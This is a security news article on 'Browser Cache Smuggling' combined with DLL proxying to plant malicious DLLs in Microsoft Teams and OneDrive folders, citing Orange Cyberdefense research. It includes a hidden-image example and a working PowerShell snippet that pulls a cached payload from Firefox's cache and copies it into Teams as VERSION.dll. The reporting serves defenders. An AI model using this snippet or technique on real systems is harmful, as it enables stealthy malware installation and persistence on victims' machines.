Emerging Threat: Hackers Exploit Browser Cache and DLL Proxying to Target Microsoft Teams and OneDrive:
A newly discovered attack method that combines browser cache manipulation and DLL proxying has emerged as a significant cybersecurity risk for organizations using Microsoft Teams and OneDrive.
Browser Cache Smuggling: A Stealthy Malware Delivery Technique
Known as Browser Cache Smuggling, this technique enables cybercriminals to bypass traditional security defenses by exploiting web browsers' caching mechanisms to deliver malware disguised as legitimate files.
Modern browsers store static files such as images and JavaScript to enhance performance. Attackers take advantage of this feature by hosting malicious DLL files on a webpage, disguising them as benign resources.
When a user visits the malicious site, the browser caches the disguised DLL file based on manipulated Content-Type headers, mistakenly treating it as a safe asset, according to Orange Cyberdefense.
For example, a compromised HTML page may contain a hidden <img src="/payload.dll">, prompting the browser to store the DLL in its cache.
To execute the attack, hackers then socially engineer victims into running a PowerShell command that retrieves the cached DLL and moves it to a vulnerable directory, such as the localappdata folders used by Microsoft Teams or OneDrive.
DLL Proxying: Evading Detection and Maintaining Persistence
To avoid detection and ensure applications continue to function normally, attackers utilize DLL proxying.
Legitimate applications like Microsoft Teams load DLL files from their installation directories following Windows’ DLL search order. By placing a malicious DLL in these directories, attackers can hijack application processes without raising suspicion.
The rogue DLL functions as a proxy, forwarding legitimate API calls to the original DLL while simultaneously executing malicious payloads, such as Cobalt Strike beacons.
For instance, if attackers replace VERSION.dll in the Teams directory with a compromised version, it could:
Execute malware to establish a command-and-control (C2) connection.
Relay legitimate API requests to the real DLL, ensuring the application continues running normally.
This approach allows malware to operate stealthily, blending in with routine system activity.
Why Microsoft Teams and OneDrive Are Prime Targets
Orange Cyberdefense identified Microsoft Teams and OneDrive as ideal attack vectors because:
They operate with user privileges, making DLL hijacking possible without admin access.
Their frequent internet communication helps disguise malicious traffic.
Attackers use PowerShell scripts to search browser caches (e.g., Firefox’s cache2/entries) for smuggled DLL files and relocate them to Microsoft Teams’ directories, effectively bypassing network-based security measures.
powershellforeach ($f in @("$env:LOCALAPPDATA\Mozilla\Firefox\Profiles\*.default-release\cache2\entries\")) {
gci $f -r | % {
if (Select-String -Pattern "PAYLOAD" -Path $_.FullName) {
cp $_.FullName "$env:LOCALAPPDATA\Microsoft\Teams\VERSION.dll"
}
}
}
With an estimated 78% of enterprises relying on Microsoft 365, this technique presents a widespread and pressing security risk.
As organizations and browsers increasingly adopt stricter caching policies, both security teams and ethical hackers must stay ahead of these evolving threats.
Initially disclosed at Insomni’hack 2025, this attack underscores the importance of layered cybersecurity defenses to mitigate the risk of socially engineered threats that exploit trusted software.
